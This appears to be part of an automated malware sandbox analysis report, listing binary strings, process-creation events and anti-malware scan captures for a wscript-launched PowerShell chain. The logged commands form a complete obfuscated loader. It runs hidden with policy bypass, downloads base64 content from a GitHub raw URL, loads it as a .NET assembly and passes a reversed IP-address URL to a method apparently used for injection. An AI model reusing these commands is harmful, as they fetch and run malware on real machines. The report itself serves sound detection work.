    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.1825456759.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.1818349189.00000178393F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR", "0", "false");
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC5700BD pushad ; iretd 2_2_00007FFAAC5700C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC570952 push E95B30D0h; ret 2_2_00007FFAAC5709C9
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC560CCE pushad ; retf 4_2_00007FFAAC560D3D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC567567 push ebx; iretd 4_2_00007FFAAC56756A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC63236C push 8B485F92h; iretd 4_2_00007FFAAC632371
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC6323BE push 8B485F92h; iretd 4_2_00007FFAAC6323C6
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
